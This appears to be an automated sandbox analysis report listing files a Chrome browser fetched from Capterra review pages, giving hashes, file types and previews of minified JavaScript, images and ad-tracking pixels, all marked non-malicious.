                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7219
                                                                                                                                                                                                        Entropy (8bit):4.965108263631849
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LZSZrq7UvjavVvkEwYQ5ttZzeVfhGql+dhHK1gfGwUBURfiORtNJbSbyH:rUvmvVbrQ7wf0RdhKBdBUtZVb+yH
                                                                                                                                                                                                        MD5:E2B7DCE09356545F72E236BA66C055BB
                                                                                                                                                                                                        SHA1:271F2D58E03C38F0D1C7A56D5D8DA5636E491307
                                                                                                                                                                                                        SHA-256:37C420323A40793552B7FD3EAB34C92F6D00D017D47CCEAA277B7D59637D0B79
                                                                                                                                                                                                        SHA-512:F396A1CC1F3AAACFD571FF3930C3A6D9858707ECD07332E55CCF6DFA188F6E07F78E256B967C044F1373D9797767125A0AF291BB170463C28A1098499A3CBE5D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/api/v1/categories/targets?lang=en
                                                                                                                                                                                                        Preview:[{"id":"fae4a9b6-c5fb-461e-bcb5-9383e215bcc3","name":"Inventory Control"},{"id":"8bf2a655-913e-445c-bf66-5fbaec13745c","name":"Property Management"},{"id":"6ba0e397-1df9-45ad-ad75-82d479d0c0be","name":"Human Resources"},{"id":"d1cb4e56-983a-416d-8d02-69a35b0a337e","name":"HVAC"},{"id":"669d11f4-0937-4967-b147-8eec8cbd1120","name":"Employee Scheduling"},{"id":"4c7ba4f6-a5c3-4fcf-bb0b-388597ecee9d","name":"CRM"},{"id":"19345941-9e13-48df-b935-8c7bc5469c94","name":"Network Security"},{"id":"2c4a521a-9623-411f-a0bc-e97bd500fa53","name":"Real Estate Property Management"},{"id":"79bb116b-8441-4448-a7bb-63a264450f58","name":"Cloud Management"},{"id":"9cffd4a5-739d-448a-8ef8-05cfdbad564f","name":"CMMS"},{"id":"6a1c5934-4c0e-421b-a62d-8a8a14882d34","name":"Network Monitoring"},{"id":"cb74f37a-e855-4705-ac54-35ef9000cbc2","name":"Payroll"},{"id":"9a9d31a6-d9e9-4796-9a56-983f7262d148","name":"Field Service Management"},{"id":"e96d0ffb-321d-4496-bcc6-18b0a61efa31","name":"Construction Estimating"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16158), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16158
                                                                                                                                                                                                        Entropy (8bit):5.282357649306053
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:bUw7XCCeCbmO7g17ixKXvLvO7Sxng7UCyyO7k7bE67H:YUCCem5MzHxnnC8g
                                                                                                                                                                                                        MD5:C4915B4771DD5CC060DE08D60BE574C9
                                                                                                                                                                                                        SHA1:48AE1B10C5F165CE33F863E6A492241E76F4738A
                                                                                                                                                                                                        SHA-256:3F02F078B750ACE5DBFB11EFC92DEC520D2D6600240F0EA7BD8662631FA476DC
                                                                                                                                                                                                        SHA-512:2F1336AF0CB9FB0C6EF0EE16A6F3A56024B0800DDDB8940F02D34842A7E975B663914D35EAD2C9BCF0A2D2B2F5CD28C5C10B810EB32FD8F9D7091DC01F05F28D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2780],{62780:function(e,t,r){r.d(t,{Oo:function(){return B},dy:function(){return W},ew:function(){return A},tl:function(){return O},ZF:function(){return u}});var n=r(7653),a=r(96890),o=r(10803),l=r(57908),i=["children","className","color","isInteractive","onClick","onChange","size","total","value","typography"];function c(){return(c=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}function s(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=Array(t);r<t;r++)n[r]=e[r];return n}var u=(0,n.forwardRef)(function(e,t){var r,u=e.children,f=e.className,m=e.color,p=e.isInteractive,d=e.onClick,v=e.onChange,y=e.size,b=e.total,g=e.value,h=void 0===g?0:g,O=e.typography,j=function(e,t){if(null==e)return{};var r,n,a=function(e,t){if(null==e)return{};var r,n,a={},o=Object.ke
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5142), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5142
                                                                                                                                                                                                        Entropy (8bit):5.465782590927683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ywxCmQoPEBqenzTRVp2mpiK5Vg9EhsdRNVuDcVfSa82oReitfsEnCjQ5:BxN8BNzTXpVsSsdRNJUjRtk8Cs5
                                                                                                                                                                                                        MD5:C620B39B45F4923EFE5DFF2A22EC6658
                                                                                                                                                                                                        SHA1:7CB6EDA5A5284603963974004D5879240B0A8F75
                                                                                                                                                                                                        SHA-256:AD74410B88B0F668BD45B9DE646E6E865E63F6018D0C9D5DFE74A21353417A1C
                                                                                                                                                                                                        SHA-512:9C30E35A907D6B283D6ADC02DCAE070A99075371B024C724EBF00BA2C4CA86B2B1CE12B8D7FD37105F23F173D46C0437793C0B8A90373EB44D3FB433DFB75B46
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(){"use strict";var e,t,r,n,a,o,c,u,i,f={},d={};function l(e){var t=d[e];if(void 0!==t)return t.exports;var r=d[e]={id:e,loaded:!1,exports:{}},n=!0;try{f[e].call(r.exports,r,r.exports,l),n=!1}finally{n&&delete d[e]}return r.loaded=!0,r.exports}l.m=f,e=[],l.O=function(t,r,n,a){if(r){a=a||0;for(var o=e.length;o>0&&e[o-1][2]>a;o--)e[o]=e[o-1];e[o]=[r,n,a];return}for(var c=1/0,o=0;o<e.length;o++){for(var r=e[o][0],n=e[o][1],a=e[o][2],u=!0,i=0;i<r.length;i++)c>=a&&Object.keys(l.O).every(function(e){return l.O[e](r[i])})?r.splice(i--,1):(u=!1,a<c&&(c=a));if(u){e.splice(o--,1);var f=n();void 0!==f&&(t=f)}}return t},l.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return l.d(t,{a:t}),t},r=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},l.t=function(e,n){if(1&n&&(e=this(e)),8&n||"object"==typeof e&&e&&(4&n&&e.__esModule||16&n&&"function"==typeof e.then))return e;var a=Object.create(null);l.r(a);va
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):2.459147917027245
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                        MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                        SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                        SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                        SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.......,..........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11897), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11897
                                                                                                                                                                                                        Entropy (8bit):5.374339678987172
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:02GDnLI5hqI1MQlbgKlq5PcrTJT7QWepwd78qg0FZrqpNj5/+vNv1CPI3E1:ELLITsKlqPubd7i0F9PK
                                                                                                                                                                                                        MD5:268B90396B896F06BFC62613C7FBFD44
                                                                                                                                                                                                        SHA1:98666368AF88733887B6FCD7AADD43072370F8E8
                                                                                                                                                                                                        SHA-256:897804D7144868CDB08EFA8E8A31CE0E9579962257037059239F804080626DEC
                                                                                                                                                                                                        SHA-512:F99E5EE064594A0E2A359B1DFF1D4C68CF7666CB941EE9BD59A01B134E320D4049FC196D5F67AAA0FEFB88BFE784565F02B79421071D0FC166B2EAE65BCBD4EB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/847-853074d4dea368fa.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[847],{29312:function(e,t,r){"use strict";r.d(t,{R:function(){return x}});var n=r(52322);r(2784);var s=r(13980),l=r.n(s),i=r(87254),a=r(65313),o=r(51334),c=r(35763),d=r(89407),u=r.n(d);let x=e=>{let{label:t,value:r,items:s}=e;return(0,n.jsxs)(a.Z,{className:u().control,children:[(0,n.jsx)(o.Z,{className:u().label,children:t}),(0,n.jsx)("div",{className:"rx-grow",children:(0,n.jsxs)(c.P,{value:r,onChange:t=>{let{onChange:r}=e;r(t.target.value)},placeholder:i.ag._({id:"N40H+G"}),"data-testid":"filter-by",children:[(0,n.jsx)(c.P.Item,{value:"all","data-testid":"filter-by-item",children:i.ag._({id:"N40H+G"})}),s.map(e=>{let{id:t,name:r}=e;return(0,n.jsx)(c.P.Item,{value:t,"data-testid":"filter-by-item",children:r},t)})]})})]})};x.propTypes={label:l().string,value:l().string,onChange:l().func.isRequired,items:l().arrayOf(l().shape({id:l().string.isRequired,name:l().string.isRequired}))}},43360:function(e,t,r){"use strict";r.d(t,{Z:func
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (706), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):706
                                                                                                                                                                                                        Entropy (8bit):5.618703288727465
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:hnMQbwuOaxyCkv4AEHeMyp1dsTiUMGT2IWaEuZO/Ik+BWSXf:hMiRO9ZpzE8G9PTbbv
                                                                                                                                                                                                        MD5:31D3CDB5EACCF740263317A3233A439F
                                                                                                                                                                                                        SHA1:9699129306698094F69CD289E560255143DA745A
                                                                                                                                                                                                        SHA-256:FDA7E3BACAC05D7ACEEAF3E9F3E137B1523E63C1D48950C5DF53D7E9B565CA56
                                                                                                                                                                                                        SHA-512:89B26BE6A8FF035136EFC9870327B5BC31496AA5A8FD766116824580F8C53D5EE41172833937EF91BCF1C13766A689DB0F32619BCB635A15846CEF8AA7C24721
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://8036043.fls.doubleclick.net/activityi;dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F?
                                                                                                                                                                                                        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=*;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F"/></body></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (63529), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):63529
                                                                                                                                                                                                        Entropy (8bit):5.281778375193074
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:A1yEnyxQEWJZDb4aJ0hHUaHFLPrW+p0B3zmE7ceIU1xeAGxM9:sJ1ENL4cFMr9
                                                                                                                                                                                                        MD5:02F09379C544BEFA413D22EB57ED41DE
                                                                                                                                                                                                        SHA1:156FF3FBF28D890EB0F79754E436AC3A66B3DE24
                                                                                                                                                                                                        SHA-256:E555F4B34B579E6528D6BBD4819620A634C0759B41DFA99520B7CA5AA5117B11
                                                                                                                                                                                                        SHA-512:C2252DE8C217909D15CBA15F47631751B69FE56DD167716A5BE05A4104DDFE28332764EBFDCFFF0DF2614DC9187E2C70B199B5EAC49D45F7A6DA7FF2F3E4AB8E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/18.9c1bd1fb.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[18],{"0O9J":function(e,t,n){"use strict";var r=n("lEaq"),o=n.n(r),i=n("ERkP"),a=n.n(i),c=n("aWzz"),s=n.n(c),u=n("11Hm"),l=n("I9iR"),p=n.n(l),f=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e};function _possibleConstructorReturn(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!==typeof t&&"function"!==typeof t?e:t}var d=function(e){function Router(){var t,n;!function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,Router);for(var r=arguments.length,o=Array(r),i=0;i<r;i++)o[i]=arguments[i];return t=n=_possibleConstructorReturn(this,e.call.apply(e,[this].concat(o))),n.state={match:n.computeMatch(n.props.history.location.pathname)},_possibleConstructorReturn(n,t)}return function _inherits(e,t){if("functio
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F?
                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):34485
                                                                                                                                                                                                        Entropy (8bit):6.043940999634818
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:xVFVGRVBx/CbTx2Oc3lOKvdf5hDTOeELmAaHs7FNV0JaNY:SVKbTx2mKpvTtEdaCbVSaq
                                                                                                                                                                                                        MD5:4C50AEE008CE437EB4B8E62E720D71D8
                                                                                                                                                                                                        SHA1:184064A809EF17D0D9DE4207EB5F9B58BEE99144
                                                                                                                                                                                                        SHA-256:5D4F370F357D2703D5071F1BADAB2C33A8B6D496F36873F0614A53D83F67D41F
                                                                                                                                                                                                        SHA-512:DF9147899346D057E80CF25DCD6CF1AA02E84484E20DDEFF332B9088DFBBA62FDD797D101E521FA6E3301E7CF2A71465A358966AFEE764743ADB058AF5C65823
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/hubspot_client.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>7</title>. <defs>. <path d="M10.0731707,0 L107.926829,0 C113.490088,0 118,4.50991215 118,10.0731707 L118,107.926829 C118,113.490088 113.490088,118 107.926829,118 L10.0731707,118 C4.50991215,118 0,113.490088 0,107.926829 L0,10.0731707 C0,4.50991215 4.50991215,0 10.0731707,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9355), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9355
                                                                                                                                                                                                        Entropy (8bit):5.451439132993347
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:lAmiaN2r5Tk8Tzpppi9b6WHvX6hfhM3Cd+0m0fEpaaotRPXVD9HRAmBwgKDGqco+:biaN21Tk8syhJMqrp3PP7wDAtlJZaf6
                                                                                                                                                                                                        MD5:949C9C980996DD68D065A4177353E77A
                                                                                                                                                                                                        SHA1:48C0BBB5664FFB020A1B4F45724F6B77C008D5AD
                                                                                                                                                                                                        SHA-256:8BB251DD4728AF43C5741F86F5D9B4CD7A5695009E17D0C38CD4E1B71AADA473
                                                                                                                                                                                                        SHA-512:86BAB78D750DDD2D28EF91CBE06CC88051BDA06563CC6AF0A9C065EFF66948B51D8E01AC7FB5B9E1B53B4389EFC65215A16E5E08700D0C4B40B1C4CB7AE05C6B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5356],{59552:function(e,r,t){(window.__NEXT_P=window.__NEXT_P||[]).push(["/products-search",function(){return t(62171)}])},51085:function(e,r,t){"use strict";t.d(r,{Z:function(){return h}});var a=t(52322);t(2784);var s=t(40489),l=t(5632),n=t(6495),i=t(25997),c=t(5762),d=t(15781),o=t(27990),x=t(2595),u=t.n(x);let m=(e,r)=>{let t=new URLSearchParams(r).toString();return t?"/products/new/".concat(e._id,"/?").concat(t):"/products/new/".concat(e._id,"/")};var h=e=>{let{products:r,isLoading:t=!1,getProductReviewFormUrl:x=m,twoColumns:h=!1,className:p=""}=e,{query:g}=(0,l.useRouter)(),{addEvent:v}=(0,i.ZQ)();return(0,a.jsxs)(n.Z,{className:(0,s.Z)("rx-grid rx-gap-md rx-grid-cols-1 md:rx-grid-cols-2",h?"xl:rx-grid-cols-2":"xl:rx-grid-cols-3",u().root,p),"data-testid":"product-grid",children:[r.map(e=>(0,a.jsx)(c.n,{href:x(e,g),imageUrl:(0,o.I)(e.logoUrl),title:e.name,subtitle:"by ".concat(e.vendorName),...v({...i.PK,value:e._id})},e._id)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (37568), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):37568
                                                                                                                                                                                                        Entropy (8bit):5.295748739379976
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:D+2C7C/DbzsKmYlKd/xVCJwhSwnzCVcSCsaW:D+KDbzs55d5iwhSwnmn
                                                                                                                                                                                                        MD5:683AA6D8A155F834A7DE2144789CAF5E
                                                                                                                                                                                                        SHA1:BF797134EC28D757EDD196A7DB795621299E4AEF
                                                                                                                                                                                                        SHA-256:E0A14D1E5656DEA4D1DD61FA372E389A49A1ED5219769FEBB2CE9209DCF8132B
                                                                                                                                                                                                        SHA-512:1B0AD17AF8F4955E5B430CBBA5A38FE677381421E33242710D2A7C6DC36BCC81E1A9F2DD623040C69377AE392FF93FE8C77907AE164D6ABC32D68755DB2FF801
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1301],{58089:function(e,t,r){"use strict";r.d(t,{Z:function(){return u}});var n=r(7653),o=r(57908),i=r(96890);function a(e){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}var l=["className","children","variant"];function c(){return(c=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var u=(0,n.forwardRef)(function(e,t){var r,u,s,f=e.className,p=e.children,d=e.variant,b=void 0===d?"primary":d,y=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},i=Object.keys(e);for(n=0;n<i.length;n++)r=i[n],t.indexOf(r)>=0||(o[r]=e[r]);return o}(e,t);if(Object.getOwnPropertySymbols){var i=Ob
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1399
                                                                                                                                                                                                        Entropy (8bit):5.404876300526083
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:hyKgRJG+MtcfRxQjN6gdHd6IIyvWNxqfAe/kA0Myk7Z7D1:hyK0GXt+RyZYdqWNMfAi2jk7D
                                                                                                                                                                                                        MD5:900B1FD68F5814F5181009DF300BAC19
                                                                                                                                                                                                        SHA1:861B739060996FF99CD6103C283C4EDFEB49761E
                                                                                                                                                                                                        SHA-256:90778EE0F7BCF5FF90A8A02C1C4BA7AD1F8EADB3AB117D5B585A9E4F00FC5CE6
                                                                                                                                                                                                        SHA-512:50D4EBCAB9DB82CB2607783F27D406CE1157A81965170B2B5391A84149D5A881C992C8CCC0B4608D44CE2C6E8FBEBDC3F25D2079C0A347C22854A32DF6A6B1AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....D.......sRGB........:PLTEGpL...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................tRNS..........8z.5I+..h.......&...o.....?.Z ..j...]......CL..m......H...U.BP.2..Q...".FJS..,.V.).q.X.:....<....|{..'.G.1d.>.$...xO.R..3.pu.;....(%.y.A....\...gl.....[.YD.`.*e/9.._.6..vk.....e....!IDAT8.c` .p......$...d..ic.v..&.29=|.u.....#.|..s...V.......Kb.A...^(.F..-....(#.Q..".%..2~.K.r.).Z.{.*k"..hi..V;....L..+.W]....6@.P..0...&.d.BLf@......E.....U.$.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4593
                                                                                                                                                                                                        Entropy (8bit):7.244255788831562
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jGc5N26MT0D5MdtbZPAVwzVHlQV7apvm4/GZw:+0ycoYNMtKw/QVMvmE
                                                                                                                                                                                                        MD5:4C2D741C4D1A1377D8EC4219F33B54B5
                                                                                                                                                                                                        SHA1:5C5290E54AAF449EBD61419D17A9BEBDB571822C
                                                                                                                                                                                                        SHA-256:0600FDDEE0EFA212E58B453E2946A70C10DA21735E3F746BEEE0383801CBDF76
                                                                                                                                                                                                        SHA-512:9EE71973C72294254FD2FA4F7C483459B6FF6F67AD9375AA4F80E9D37801F17EE04546B39CDA0722567B8422403D733BF4D8F27C199238BB134852A51896FF6D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/505b4ccb-8f48-405a-bd30-39a80ed24293.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (49289)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1008878
                                                                                                                                                                                                        Entropy (8bit):5.418528817114226
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:0fJF6TpiEc6EKjTQYThF0Y9LrnWXuNcEa:0fJF6TpiEfxNSEa
                                                                                                                                                                                                        MD5:66FDCDCE4E09FC0843364E9F0CE9DA27
                                                                                                                                                                                                        SHA1:A205CFC5187567E1F735641F0BE28C931A998210
                                                                                                                                                                                                        SHA-256:8189057C2CD91FD4A9129FBBC7276ADE630F550CC96E99972DEE799A100E5FB7
                                                                                                                                                                                                        SHA-512:7C7D79073ADBAFE1A4B4F5F62591CD28DA04D2E1FDD802E94FACE3D6BC33FF7C86C25F7A790AFA031A594A2A3FD208274A427E823EFF012579DA97EDD3D0AE9B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/pages/_app-af44b767735d6640.js
